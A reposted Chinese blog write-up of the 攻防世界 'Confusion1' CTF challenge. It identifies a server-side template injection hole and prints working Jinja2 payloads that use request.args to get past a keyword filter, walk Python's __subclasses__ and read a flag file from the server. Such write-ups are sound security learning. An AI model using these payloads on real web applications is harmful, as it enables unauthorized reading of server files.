攻防世界 Confusion1

其他 2021-03-20 01:29:30 阅读次数: 0
  • 进入页面
  • index.php页面查看了源码,没有什么发现
  • 进入Login.php页面 返回404???
  • 查看一下源码在这里插入图片描述
  • 从这里看可能是个SSTI模板注入
  • 这里推荐个初学者的SSTI文章SSTI
    y在这里插入图片描述
  • 确定是SSTI模板注入
  • 按照正常的注入流程{ {''.__class__.__mro__}}
  • 页面返回的是 从这里来看应该是存在一个过滤 在这里插入图片描述
  • 想到做过的SSTI题目的绕过方式 shrine用的是url_for函数 尝试一下
  • { {url_for.__globals__}}
    在这里插入图片描述
  • { {get_flashed_messages.__globals__}}结局一样 得得得!!! 又是没涉及到的新知识
  • 明天整理一下SSTI学过的知识 现在去看wp了
  • wp涉及到了一个新的绕过姿势request.args
  • 第一步:{ {''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__
  • 有file类 可以读取
  • 第二步:{ {''[request.args.a][request.args.b][2][request.args.c]()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt")[request.args.d]}}?a=__class__&b=__mro__&c=__subclasses__&d=read()

猜你喜欢

转载自blog.csdn.net/CyhDl666/article/details/114111168
今日推荐
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
最强开源大模型 Llama 3 上架 Gitee AI
周排行
自媒体文章如何提高原创度以及如何检测原创度
开启qq邮箱的smtp服务
Qt程序单次启动(QSingleApplication类)
国外的外包网站
更新IDEA主题——放飞代码风格
cocos2dx 实现搓牌效果(翻牌效果),包括铺平动画
dict和json之间的互相转换
angular的一些思考
. Fibonacci数列是这样定义的: F[0] = 0 F[1] = 1 for each i ≥ 2: F[i] = F[i-1] + F[i-2] 因此,Fibonacci数列就形如:0, 1
洛谷P1064 金明的预算方案
每日归档
更多
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)
2024-04-16(70)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022